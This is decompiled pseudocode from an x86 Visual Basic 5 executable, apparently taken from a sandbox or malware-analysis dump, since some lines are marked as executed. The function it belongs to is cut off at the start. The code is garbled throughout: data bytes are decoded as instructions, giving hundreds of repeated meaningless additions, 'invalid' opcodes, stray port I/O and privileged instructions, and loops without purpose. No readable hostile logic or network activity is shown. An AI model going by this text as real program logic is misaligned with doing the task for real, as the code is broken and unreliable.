                    				void* _t561;
                    				signed int _t562;
                    				void* _t564;
                    				signed int _t565;
                    				signed char _t571;
                    				signed char _t572;
                    				void* _t573;
                    				signed int _t574;
                    				intOrPtr* _t576;
                    				void* _t577;
                    				signed char _t580;
                    				void* _t582;
                    				void* _t583;
                    				signed int _t584;
                    				signed int _t586;
                    				signed int _t587;
                    				void* _t589;
                    				intOrPtr* _t591;
                    				intOrPtr* _t593;
                    				void* _t595;
                    				void* _t596;
                    				signed char _t599;
                    				void* _t600;
                    				intOrPtr* _t601;
                    				signed char _t602;
                    				signed char _t605;
                    				signed char _t606;
                    				intOrPtr* _t607;
                    				signed int _t608;
                    				intOrPtr* _t610;
                    				signed int _t611;
                    				signed int _t612;
                    				signed int _t613;
                    				signed int _t614;
                    				intOrPtr* _t615;
                    				intOrPtr* _t620;
                    				intOrPtr* _t621;
                    				signed int _t623;
                    				intOrPtr* _t625;
                    				signed int _t626;
                    				signed char _t630;
                    				signed int _t631;
                    				signed char _t636;
                    				signed char _t641;
                    				intOrPtr* _t643;
                    				intOrPtr* _t645;
                    				signed char _t647;
                    				intOrPtr* _t648;
                    				intOrPtr* _t650;
                    				intOrPtr* _t660;
                    				signed int _t661;
                    				void* _t663;
                    				void* _t665;
                    				void* _t668;
                    				signed char _t670;
                    				intOrPtr* _t671;
                    				signed int _t672;
                    				signed char _t673;
                    				signed char _t675;
                    				signed char _t676;
                    				signed int _t677;
                    				signed int _t678;
                    				intOrPtr* _t679;
                    				intOrPtr* _t681;
                    				signed int _t682;
                    				signed int _t684;
                    				intOrPtr* _t689;
                    				signed char _t690;
                    				intOrPtr* _t691;
                    				void* _t692;
                    				intOrPtr* _t693;
                    				intOrPtr* _t694;
                    				intOrPtr* _t695;
                    				void* _t700;
                    				signed int* _t703;
                    				intOrPtr* _t704;
                    				signed int* _t705;
                    				void* _t707;
                    				intOrPtr* _t708;
                    				signed char _t710;
                    				intOrPtr* _t712;
                    				intOrPtr* _t713;
                    				intOrPtr* _t714;
                    				intOrPtr* _t715;
                    				signed int _t717;
                    				signed char _t719;
                    				intOrPtr* _t721;
                    				intOrPtr* _t722;
                    				intOrPtr* _t723;
                    				void* _t724;
                    				intOrPtr* _t725;
                    				signed int _t728;
                    				signed int* _t730;
                    				signed int* _t731;
                    				signed int* _t732;
                    				signed int* _t733;
                    				void* _t737;
                    				signed char _t740;
                    				signed char _t741;
                    				signed char _t744;
                    				signed char _t745;
                    				intOrPtr* _t748;
                    				signed int* _t750;
                    				void* _t751;
                    				void* _t756;
                    				intOrPtr* _t758;
                    				signed char _t759;
                    				signed int _t760;
                    				signed char _t763;
                    				signed char _t764;
                    				signed int _t765;
                    				signed int _t767;
                    				void* _t772;
                    				void* _t780;
                    				void* _t818;
                    				signed long long _t845;
                    
                    				_t845 = __fp0;
                    				_t756 = __esi;
                    				_t748 = __edi;
                    				_t740 = __edx;
                    				_t703 = __ecx;
                    				_t689 = __ebx;
                    				_t444 = __eax;
                    				_push("VB5!6&*");
                    				while(1) {
                    					_t445 = _t763;
                    					_t764 = _t444;
                    					asm("sbb [eax], eax"); // executed
                    					L004011A0(); // executed
                    					 *_t445 =  *_t445 + _t445;
                    					 *_t445 =  *_t445 + _t445;
                    					 *_t445 =  *_t445 + _t445;
                    					 *_t445 =  *_t445 ^ _t445;
                    					 *_t445 =  *_t445 + _t445;
                    					_t446 = _t445 + 1;
                    					 *_t446 =  *_t446 + _t446;
                    					 *_t446 =  *_t446 + _t446;
                    					 *_t446 =  *_t446 + _t446;
                    					 *0x3980a88f =  *0x3980a88f + _t740;
                    					 *((intOrPtr*)(_t759 - 0xc4a53bc)) =  *((intOrPtr*)(_t759 - 0xc4a53bc)) + _t740;
                    					 *(_t748 - 0x48) = _t703;
                    					 *_t740 = fs;
                    					 *_t446 =  *_t446 + _t446;
                    					 *_t446 =  *_t446 + _t446;
                    					 *_t446 =  *_t446 + _t446;
                    					 *_t446 =  *_t446 + _t446;
                    					asm("rcl ch, 0xee");
                    					_t444 = _t446 +  *((intOrPtr*)(_t756 + 0x6f));
                    					if(_t444 < 0) {
                    						break;
                    					}
                    					_pop(_t748);
                    					_t759 =  *(_t689 + 0x6b) * 0x726f7265;
                    					 *[ss:eax] =  *[ss:eax] + _t444;
                    					 *_t444 =  *_t444 + _t444;
                    					 *_t444 =  *_t444 + _t444;
                    					_t763 = _t764 + 1 - 1;
                    					 *_t444 =  *_t444 ^ _t444;
                    					_push(es);
                    					asm("stc");
                    					if( *_t444 > 0) {
                    						continue;
                    					} else {
                    						asm("in al, dx");
                    						asm("sti");
                    						_t740 = 0x49;
                    						_t780 = _t689 - 1;
                    						_t764 = 0x17291d76;
                    						while(_t780 > 0) {
                    							 *_t748 =  *_t748 - _t740;
                    							_t444 = _t444 - 0x7dd6ce7a;
                    							if(_t444 <= 0) {
                    								continue;
                    							} else {
                    								_pop(_t764);
                    								_t740 = 0x2b;
                    								asm("loop 0xfffffff9");
                    							}
                    							break;
                    						}
                    						_t689 = 0xc;
                    						 *((intOrPtr*)(_t740 - 0x6c2ca000)) =  *((intOrPtr*)(_t740 - 0x6c2ca000)) + _t703;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						 *_t444 =  *_t444 + _t444;
                    						_t444 = _t444 ^  *_t703;
                    						 *_t444 =  *_t444 + _t444;
                    					}
                    					break;
                    				}
                    				 *_t444 =  *_t444 + _t444;
                    				 *_t444 =  *_t444 + _t444;
                    				_t447 = _t444 |  *_t444;
                    				_t758 = _t756 - 1 + 1;
                    				asm("outsd");
                    				if(_t758 < 0) {
                    					L12:
                    					 *_t689 =  *_t689 + 1;
                    					_t448 = _t447 -  *_t447;
                    					 *_t448 =  *_t448 + _t448;
                    					_t704 = _t703 +  *_t448;
                    					 *((intOrPtr*)(_t689 + 0x6f)) =  *((intOrPtr*)(_t689 + 0x6f)) + _t448;
                    					asm("insd");
                    					asm("insd");
                    					asm("popad");
                    					asm("outsb");
                    					goto L13;
                    				} else {
                    					_t448 = _t447 - 1;
                    					_t704 = _t447;
                    					_t764 = _t764;
                    					 *0x46000c01 =  *0x46000c01 + _t704;
                    					asm("outsd");
                    					if( *0x46000c01 < 0) {
                    						L13:
                    						_t450 = (_t448 ^  *[fs:eax]) + 1;
                    						 *_t450 =  *_t450 | _t450;
                    						_t689 = _t689 + 1;
                    						asm("outsd");
                    						asm("insd");
                    						asm("insd");
                    						asm("popad");
                    						asm("outsb");
                    						_t452 = (_t450 ^  *[fs:eax]) + 0xe8;
                    						 *_t452 =  *_t452 | _t740;
                    						_t453 = _t452 | 0x000000bf;
                    					} else {
                    						_t453 = _t448 - 1;
                    						_t759 = _t759 + 1 - 1;
                    						_push(_t764);
                    						_t704 = _t704 + 1 - 1;
                    						_t758 = _t758 - 1;
                    						 *_t704 =  *_t704 + _t689;
                    						 *_t453 =  *_t453 + _t453;
                    						_t740 = _t740 + 1;
                    						 *((intOrPtr*)(_t764 + _t704)) =  *((intOrPtr*)(_t764 + _t704)) + _t453;
                    						_t13 = _t758 + 0x6f;
                    						 *_t13 =  *((intOrPtr*)(_t758 + 0x6f)) + _t453;
                    						if( *_t13 >= 0) {
                    							_t681 = _t453 - 1;
                    							_t759 = _t759 + 1 - 1;
                    							_push(_t764);
                    							_t703 = _t704 + 1 - 1;
                    							_t758 = _t758 - 1;
                    							 *0x19fa =  *0x19fa + _t740;
                    							asm("sbb al, [eax]");
                    							_t700 = _t689 + _t703;
                    							_push(ds);
                    							 *_t681 =  *_t681 + _t681;
                    							_t764 = _t764 + 1;
                    							 *((intOrPtr*)(_t758 + 3)) =  *((intOrPtr*)(_t758 + 3)) + _t681;
                    							 *_t703 =  *_t703 + 1;
                    							_t682 = _t681 -  *_t681;
                    							 *_t682 =  *_t682 + _t682;
                    							 *_t682 =  *_t682 + _t703;
                    							 *((intOrPtr*)(_t700 + 0x6f)) =  *((intOrPtr*)(_t700 + 0x6f)) + _t682;
                    							asm("insd");
                    							asm("insd");
                    							asm("popad");
                    							asm("outsb");
                    							_t684 = (_t682 ^  *[fs:eax]) + 1;
                    							 *_t684 =  *_t684 | _t684;
                    							_t689 = _t700 + 1;
                    							asm("outsd");
                    							asm("insd");
                    							asm("insd");
                    							asm("popad");
                    							asm("outsb");
                    							asm("wrmsr");
                    							 *_t703 =  *_t703 + _t740;
                    							_t447 = ((_t684 ^  *[fs:eax]) + 0x000000f0 | 0x000000bf) + 0xef +  *((intOrPtr*)(((_t684 ^  *[fs:eax]) + 0x000000f0 | 0x000000bf) + 0xef));
                    							goto L12;
                    						}
                    					}
                    				}
                    				 *_t689 =  *_t689 + 1;
                    				_t455 = _t453 +  *_t453 -  *((intOrPtr*)(_t453 +  *_t453));
                    				 *_t455 =  *_t455 + _t455;
                    				_t705 = _t704 +  *_t455;
                    				 *((intOrPtr*)(_t689 + 0x6f)) =  *((intOrPtr*)(_t689 + 0x6f)) + _t455;
                    				asm("insd");
                    				asm("insd");
                    				asm("popad");
                    				asm("outsb");
                    				 *[fs:eax] =  *[fs:eax] ^ _t455;
                    				_t456 = _t455 + 1;
                    				 *_t456 =  *_t456 | _t456;
                    				_t690 = _t689 + 1;
                    				asm("outsd");
                    				asm("insd");
                    				asm("insd");
                    				asm("popad");
                    				asm("outsb");
                    				 *[fs:eax] =  *[fs:eax] ^ _t456;
                    				_t457 = _t456 + 0xf0;
                    				 *((intOrPtr*)(_t457 - 0x10fb40f5)) =  *((intOrPtr*)(_t457 - 0x10fb40f5)) + _t690;
                    				 *_t705 =  *_t705 + _t740;
                    				 *_t457 =  *_t457 + _t457;
                    				 *_t690 =  *_t690 + 1;
                    				 *[es:eax] =  *[es:eax] + _t457;
                    				 *((intOrPtr*)(_t758 + _t457)) =  *((intOrPtr*)(_t758 + _t457)) + _t457;
                    				 *((intOrPtr*)(_t758 + 0x72)) =  *((intOrPtr*)(_t758 + 0x72)) + _t457;
                    				asm("popad");
                    				asm("insd");
                    				 *[gs:eax] =  *[gs:eax] ^ _t457;
                    				_t458 = _t457 +  *_t705;
                    				_push(es);
                    				 *((intOrPtr*)(_t758 + 0x72)) =  *((intOrPtr*)(_t758 + 0x72)) + _t458;
                    				asm("popad");
                    				asm("insd");
                    				 *[gs:eax] =  *[gs:eax] ^ _t458;
                    				_t459 = _t458 + 0xf00000;
                    				_pop(es);
                    				_pop(ss);
                    				_t750 = 0x1204;
                    				 *_t690 =  *_t690 + 1;
                    				asm("sbb al, [eax]");
                    				 *_t459 =  *_t459 + _t459;
                    				_t460 = _t459 + 0x69540006;
                    				asm("insd");
                    				if(_t460 < 0) {
                    					L17:
                    					_t461 = _t460 + 1;
                    					 *_t750 =  *_t750 + _t461;
                    					 *_t461 =  *_t461 + _t461;
                    					 *((intOrPtr*)(_t461 + 0x31)) =  *((intOrPtr*)(_t461 + 0x31)) + _t740;
                    					_t462 = _t461 + 1;
                    					 *_t750 =  *_t750 + _t462;
                    					 *_t462 =  *_t462 + _t462;
                    					 *_t462 =  *_t462 + _t690;
                    					 *_t462 =  *_t462 ^ _t462;
                    					_pop(es);
                    					 *_t462 =  *_t462 + _t462;
                    					 *((intOrPtr*)(_t462 + _t758 + 0x70040)) =  *((intOrPtr*)(_t462 + _t758 + 0x70040)) + _t705;
                    				} else {
                    					 *_t690 =  *_t690 + _t705;
                    					_pop(es);
                    					_t845 = _t845 *  *_t705;
                    					 *_t460 =  *_t460 + _t460;
                    					_t462 = _t460 | _t690;
                    					 *_t462 =  *_t462 | _t462;
                    					_t690 = _t690 + _t690 +  *_t740;
                    					 *_t462 =  *_t462 + _t462;
                    					 *_t758 =  *_t758 + _t462;
                    					_push(es);
                    					_t33 = _t705 + 0x6d + _t759 * 2;
                    					 *_t33 =  *((intOrPtr*)(_t705 + 0x6d + _t759 * 2)) + _t740;
                    					if( *_t33 >= 0) {
                    						 *_t690 =  *_t690 + _t705;
                    						_pop(es);
                    						_t845 = _t845 *  *_t705;
                    						 *_t462 =  *_t462 + _t462;
                    						_t678 = _t462 | _t690;
                    						 *_t678 =  *_t678 | _t678;
                    						_t690 = _t690 + _t690;
                    						_t679 = _t678 +  *((intOrPtr*)(_t678 + _t678));
                    						_push(es);
                    						 *_t679 =  *_t679 + _t679;
                    						_t460 = _t679 + _t679 ^  *(_t679 + _t679);
                    						goto L17;
                    					}
                    				}
                    				 *_t462 =  *_t462 + _t462;
                    				asm("pushad");
                    				 *_t462 =  *_t462 ^ _t462;
                    				_pop(es);
                    				 *_t462 =  *_t462 + _t462;
                    				 *_t462 = _t705 +  *_t462;
                    				 *_t462 =  *_t462 ^ _t462;
                    				 *_t462 =  *_t462 + _t462;
                    				_push(cs);
                    				 *_t462 = _t705 +  *_t462;
                    				_t463 = _t462 & 0x00000040;
                    				 *_t463 =  *_t463 + _t463;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t463 =  *_t463 + _t463;
                    				 *_t463 =  *_t463 + _t463;
                    				asm("cld");
                    				asm("daa");
                    				_t466 = _t705;
                    				_t707 = _t463 + 1 + _t705 + 1;
                    				 *_t466 = _t466 +  *_t466;
                    				 *_t466 = _t466 +  *_t466;
                    				_t466[0x91f] = _t466[0x91f] + _t707;
                    				 *_t466 = _t466 +  *_t466;
                    				 *_t466 = _t466 +  *_t466;
                    				 *_t466 = _t466 +  *_t466;
                    				 *_t466 = _t466 +  *_t466;
                    				 *_t466 = _t466 +  *_t466;
                    				_t467 = _t466 + _t707;
                    				asm("adc eax, [eax]");
                    				 *_t467 =  *_t467 + _t467;
                    				asm("adc [eax], eax");
                    				 *0x40 =  *0x40 | _t467;
                    				 *_t467 =  *_t467 + _t467;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t467 =  *_t467 + _t467;
                    				 *_t467 =  *_t467 + _t467;
                    				 *_t467 = gs;
                    				_t468 = _t467 + 1;
                    				 *_t468 =  *_t468 + _t690;
                    				_t469 = _t740;
                    				_t741 = _t468;
                    				_t708 = _t707 + 1;
                    				 *_t469 =  *_t469 + _t469;
                    				 *_t469 =  *_t469 + _t469;
                    				 *_t469 =  *_t469 + _t690;
                    				if( *_t469 <= 0) {
                    					 *_t469 =  *_t469 + _t469;
                    					 *_t469 =  *_t469 + _t469;
                    					 *_t469 =  *_t469 + _t469;
                    					 *_t469 =  *_t469 + _t469;
                    					 *_t469 =  *_t469 + _t469;
                    					 *_t469 =  *_t469 + _t469;
                    					 *((intOrPtr*)(_t764 + _t741)) =  *((intOrPtr*)(_t764 + _t741)) + _t469;
                    					_t677 = _t469 + 1;
                    					 *_t708 =  *_t708 + _t677;
                    					 *_t741 =  *_t741 + _t741;
                    					 *_t677 =  *_t677 + _t708;
                    					_t469 = _t677 & 0x00000040;
                    					 *_t469 =  *_t469 + _t469;
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    				}
                    				 *_t469 =  *_t469 + 1;
                    				 *_t469 =  *_t469 + _t469;
                    				 *((intOrPtr*)(_t469 + _t759 - 0x6dd7ffc0)) =  *((intOrPtr*)(_t469 + _t759 - 0x6dd7ffc0)) + _t690;
                    				 *_t469 =  *_t469 + _t469;
                    				 *_t469 =  *_t469 + _t469;
                    				 *_t469 =  *_t469 + _t469;
                    				_t710 = _t469;
                    				_t471 = _t708 + 0x00000001 &  *(_t708 + 1);
                    				 *_t471 =  *_t471 + _t471;
                    				 *_t471 =  *_t471 + _t471;
                    				 *_t471 =  *_t471 + _t471;
                    				 *_t471 =  *_t471 + _t471;
                    				 *_t471 =  *_t471 + _t471;
                    				 *_t471 =  *_t471 + _t471;
                    				_pop(_t765);
                    				asm("adc al, 0x40");
                    				 *_t710 =  *_t710 + _t471;
                    				 *_t750 =  *_t750 + _t710;
                    				 *_t471 =  *_t471 + _t710;
                    				_t472 = _t471 & 0x00000040;
                    				 *_t472 =  *_t472 + _t472;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t472 =  *_t472 + _t472;
                    				 *_t472 =  *_t472 + _t472;
                    				_t476 = _t710;
                    				_t712 = _t472 - 0x28 + 1 + _t690 + 1;
                    				 *_t476 =  *_t476 + _t476;
                    				 *_t476 =  *_t476 + _t476;
                    				 *((intOrPtr*)(_t476 + 0x7e)) =  *((intOrPtr*)(_t476 + 0x7e)) + _t690;
                    				_t477 = _t476 & 0x00000000;
                    				 *_t477 =  *_t477 + _t477;
                    				 *_t477 =  *_t477 + _t477;
                    				 *_t477 =  *_t477 + _t477;
                    				 *_t477 =  *_t477 + _t477;
                    				 *_t477 =  *_t477 + _t477;
                    				 *_t477 =  *_t477 + _t477;
                    				_t478 = _t765;
                    				asm("adc al, 0x40");
                    				 *_t712 =  *_t712 + _t478;
                    				 *_t712 =  *_t712 + _t712;
                    				 *_t478 =  *_t478 + _t712;
                    				_t479 = _t478 & 0x00000040;
                    				 *_t479 =  *_t479 + _t479;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t479 =  *_t479 + _t479;
                    				 *_t479 =  *_t479 + _t479;
                    				_t481 = (_t479 | 0x00000027) + 1;
                    				 *((intOrPtr*)(_t481 + 0x4191)) =  *((intOrPtr*)(_t481 + 0x4191)) + _t690;
                    				 *_t481 =  *_t481 + _t481;
                    				 *((intOrPtr*)(_t481 + 0x247f)) =  *((intOrPtr*)(_t481 + 0x247f)) + _t712;
                    				 *_t481 =  *_t481 + _t481;
                    				 *_t481 =  *_t481 + _t481;
                    				 *_t481 =  *_t481 + _t481;
                    				 *_t481 =  *_t481 + _t481;
                    				 *_t481 =  *_t481 + _t481;
                    				_t482 = _t481 + _t712;
                    				asm("adc al, 0x40");
                    				 *_t712 =  *_t712 + _t482;
                    				 *_t482 =  *_t482 + _t712;
                    				 *_t482 =  *_t482 + _t712;
                    				_t483 = _t482 & 0x00000040;
                    				 *_t483 =  *_t483 + _t483;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t483 =  *_t483 + _t483;
                    				 *_t483 =  *_t483 + _t483;
                    				_t484 = _t483 + 1;
                    				 *((intOrPtr*)(_t484 + 0x4191)) =  *((intOrPtr*)(_t484 + 0x4191)) + _t712;
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t690;
                    				if( *_t484 <= 0) {
                    					 *_t484 =  *_t484 + _t484;
                    					 *_t484 =  *_t484 + _t484;
                    					 *_t484 =  *_t484 + _t484;
                    					 *_t484 =  *_t484 + _t484;
                    					 *_t484 =  *_t484 + _t484;
                    					 *_t484 =  *_t484 + _t484;
                    					 *((intOrPtr*)(_t741 + 0x10040)) =  *((intOrPtr*)(_t741 + 0x10040)) + _t484;
                    					_pop(es);
                    					 *_t484 =  *_t484 + _t712;
                    					_t484 = _t484 & 0x00000040;
                    					 *_t484 =  *_t484 + _t484;
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    				}
                    				 *_t484 =  *_t484 + 1;
                    				 *_t484 =  *_t484 + _t484;
                    				 *((intOrPtr*)(_t758 - 0x6e87ffc0)) =  *((intOrPtr*)(_t758 - 0x6e87ffc0)) + _t712;
                    				_t713 = _t712 + 1;
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t484;
                    				 *((intOrPtr*)(_t484 + 0x247d)) =  *((intOrPtr*)(_t484 + 0x247d)) + _t713;
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t484;
                    				 *((intOrPtr*)(_t741 + 0x10040)) =  *((intOrPtr*)(_t741 + 0x10040)) + _t690;
                    				asm("adc [eax], al");
                    				 *0x40 =  *0x40 | _t484;
                    				 *_t484 =  *_t484 + _t484;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t484;
                    				_pop(_t767);
                    				 *_t484 =  *_t484 - _t484;
                    				 *(_t741 + 0x41) =  *(_t741 + 0x41) | _t741;
                    				 *_t484 =  *_t484 + _t484;
                    				asm("enter 0x247e, 0x0");
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t484;
                    				if( *_t484 != 0) {
                    					_t484 = _t484 + 1;
                    					 *_t713 =  *_t713 + _t484;
                    					 *0x40250800 =  *0x40250800 + _t484;
                    					 *_t484 =  *_t484 + _t484;
                    					 *_t484 =  *_t484 + _t484;
                    					_t690 = _t690 + _t690;
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    				}
                    				 *_t484 =  *_t484 + 1;
                    				 *_t484 =  *_t484 + _t484;
                    				 *((intOrPtr*)(_t758 + 0x40)) =  *((intOrPtr*)(_t758 + 0x40)) + _t713;
                    				 *((intOrPtr*)(_t484 - 0x6f)) =  *((intOrPtr*)(_t484 - 0x6f)) + _t690;
                    				_t714 = _t713 + 1;
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t484;
                    				 *_t484 =  *_t484 + _t714;
                    				if( *_t484 >= 0) {
                    					 *_t484 =  *_t484 + _t484;
                    					 *_t484 =  *_t484 + _t484;
                    					 *_t484 =  *_t484 + _t484;
                    					 *_t484 =  *_t484 + _t484;
                    					 *_t484 =  *_t484 + _t484;
                    					 *_t484 =  *_t484 + _t484;
                    					 *((intOrPtr*)(_t759 + _t741 + 0x10040)) =  *((intOrPtr*)(_t759 + _t741 + 0x10040)) + _t714;
                    					asm("sbb [eax], eax");
                    					 *0x40 =  *0x40 | _t484;
                    					 *_t484 =  *_t484 + _t484;
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    				}
                    				 *_t484 =  *_t484 + 1;
                    				 *_t484 =  *_t484 + _t484;
                    				 *((intOrPtr*)(_t741 + _t759)) =  *((intOrPtr*)(_t741 + _t759)) + _t714;
                    				_t485 = _t484 + 1;
                    				 *((intOrPtr*)(_t485 + 0x4192)) =  *((intOrPtr*)(_t485 + 0x4192)) + _t690;
                    				do {
                    					 *_t485 =  *_t485 + _t485;
                    					 *_t485 =  *_t485 + _t485;
                    					 *((intOrPtr*)(_t690 + 0x23)) =  *((intOrPtr*)(_t690 + 0x23)) + _t741;
                    					 *_t485 =  *_t485 + _t485;
                    					 *_t485 =  *_t485 + _t485;
                    					 *_t485 =  *_t485 + _t485;
                    					 *_t485 =  *_t485 + _t485;
                    					 *_t485 =  *_t485 + _t485;
                    					asm("in al, 0x15");
                    					_t486 = _t485 + 1;
                    					 *_t714 =  *_t714 + _t486;
                    					 *_t486 =  *_t486 + _t690;
                    					 *_t486 =  *_t486 + _t714;
                    					_t487 = _t486 & 0x00000040;
                    					 *_t487 =  *_t487 + _t487;
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    					 *_t487 =  *_t487 + _t487;
                    					 *_t487 =  *_t487 + _t487;
                    					asm("fsubr qword [ecx]");
                    					_t488 = _t487 + 1;
                    					 *((intOrPtr*)(_t488 + 0x4192)) =  *((intOrPtr*)(_t488 + 0x4192)) + _t714;
                    					 *_t488 =  *_t488 + _t488;
                    					_t490 = _t741;
                    					_t741 = _t488 + _t741;
                    					_t491 = _t490 &  *_t490;
                    					 *_t491 =  *_t491 + _t491;
                    					 *_t491 =  *_t491 + _t491;
                    					 *_t491 =  *_t491 + _t491;
                    					 *_t491 =  *_t491 + _t491;
                    					 *_t491 =  *_t491 + _t491;
                    					 *_t491 =  *_t491 + _t491;
                    					asm("sbb al, 0x16");
                    					_t492 = _t491 + 1;
                    					 *_t714 =  *_t714 + _t492;
                    					 *_t750 =  *_t750 + _t741;
                    					 *_t492 =  *_t492 + _t714;
                    					_t485 = _t492 & 0x00000040;
                    					 *_t485 =  *_t485 + _t485;
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    					 *_t485 =  *_t485 + _t485;
                    					 *_t485 =  *_t485 + _t485;
                    					asm("lodsb");
                    					 *_t485 =  *_t485 - _t485;
                    				} while ( *_t485 < 0);
                    				_t715 = _t714 + 1;
                    				 *_t485 =  *_t485 + _t485;
                    				 *_t485 =  *_t485 + _t485;
                    				 *((intOrPtr*)(_t485 - 0x6e)) =  *((intOrPtr*)(_t485 - 0x6e)) + _t741;
                    				_t493 = _t485 &  *_t485;
                    				 *_t493 =  *_t493 + _t493;
                    				 *_t493 =  *_t493 + _t493;
                    				 *_t493 =  *_t493 + _t493;
                    				 *_t493 =  *_t493 + _t493;
                    				 *_t493 =  *_t493 + _t493;
                    				 *_t493 =  *_t493 + _t493;
                    				_push(_t767);
                    				_push(ss);
                    				_t494 = _t493 + 1;
                    				 *_t715 =  *_t715 + _t494;
                    				 *_t758 =  *_t758 + _t741;
                    				 *_t494 =  *_t494 + _t715;
                    				_t495 = _t494 & 0x00000040;
                    				 *_t495 =  *_t495 + _t495;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t495 =  *_t495 + _t495;
                    				 *_t495 =  *_t495 + _t495;
                    				if( *_t495 >= 0) {
                    					_t495 = _t495 + 1;
                    					 *((intOrPtr*)(_t495 - 0x6e)) =  *((intOrPtr*)(_t495 - 0x6e)) + _t715;
                    					_t715 = _t715 + 1;
                    					 *_t495 =  *_t495 + _t495;
                    					 *_t495 =  *_t495 + _t495;
                    					 *((intOrPtr*)(_t495 + 0x2391)) =  *((intOrPtr*)(_t495 + 0x2391)) + _t495;
                    					 *_t495 =  *_t495 + _t495;
                    					 *_t495 =  *_t495 + _t495;
                    					 *_t495 =  *_t495 + _t495;
                    					 *_t495 =  *_t495 + _t495;
                    					 *_t495 =  *_t495 + _t495;
                    					 *((intOrPtr*)(_t758 + _t741 + 0x10040)) =  *((intOrPtr*)(_t758 + _t741 + 0x10040)) + _t715;
                    					asm("adc eax, 0x40250800");
                    					 *_t495 =  *_t495 + _t495;
                    					 *_t495 =  *_t495 + _t495;
                    				}
                    				_t691 = _t690 + _t690;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t495 =  *_t495 + 1;
                    				 *_t495 =  *_t495 + _t495;
                    				 *((intOrPtr*)(_t715 + 0x40 + _t759)) =  *((intOrPtr*)(_t715 + 0x40 + _t759)) + _t715;
                    				 *((intOrPtr*)(_t495 - 0x6e)) =  *((intOrPtr*)(_t495 - 0x6e)) + _t691;
                    				 *_t495 =  *_t495 + _t495;
                    				 *_t495 =  *_t495 + _t495;
                    				 *_t495 =  *_t495 + _t495;
                    				_t717 = _t495;
                    				_t497 = _t715 + 0x00000001 &  *(_t715 + 1);
                    				do {
                    					 *_t497 =  *_t497 + _t497;
                    					 *_t497 =  *_t497 + _t497;
                    					 *_t497 =  *_t497 + _t497;
                    					 *_t497 =  *_t497 + _t497;
                    					 *_t497 =  *_t497 + _t497;
                    					 *_t497 =  *_t497 + _t497;
                    					_push(ss);
                    					_t499 = _t497 + _t497 + 1;
                    					 *_t717 =  *_t717 + _t499;
                    					 *((intOrPtr*)(_t499 + _t499)) =  *((intOrPtr*)(_t499 + _t499)) + _t741;
                    					 *0x40 =  *0x40 | _t499;
                    					 *_t499 =  *_t499 + _t499;
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    					 *_t499 =  *_t499 + _t499;
                    					 *_t499 =  *_t499 + _t499;
                    					asm("sbb al, 0x29");
                    					_t500 = _t499 + 1;
                    					 *((intOrPtr*)(_t500 - 0x6e)) =  *((intOrPtr*)(_t500 - 0x6e)) + _t717;
                    					 *_t500 =  *_t500 + _t500;
                    					 *_t500 =  *_t500 + _t500;
                    					 *_t500 =  *_t500 + _t741;
                    					_t501 = _t717 + 1;
                    					_t717 = _t500;
                    					_t502 = _t501 &  *_t501;
                    					 *_t502 =  *_t502 + _t502;
                    					 *_t502 =  *_t502 + _t502;
                    					 *_t502 =  *_t502 + _t502;
                    					 *_t502 =  *_t502 + _t502;
                    					 *_t502 =  *_t502 + _t502;
                    					 *_t502 =  *_t502 + _t502;
                    					asm("cld");
                    					_push(ss);
                    					_t503 = _t502 + 1;
                    					 *_t717 =  *_t717 + _t503;
                    					 *_t691 =  *_t691 + _t741;
                    					 *_t503 =  *_t503 + _t717;
                    					_t497 = _t503 & 0x00000040;
                    					 *_t497 =  *_t497 + _t497;
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    					 *_t497 =  *_t497 + _t497;
                    					 *_t497 =  *_t497 + _t497;
                    					asm("in al, dx");
                    					 *_t497 =  *_t497 - _t497;
                    					 *_t497 =  *_t497 + _t497;
                    				} while ( *_t497 < 0);
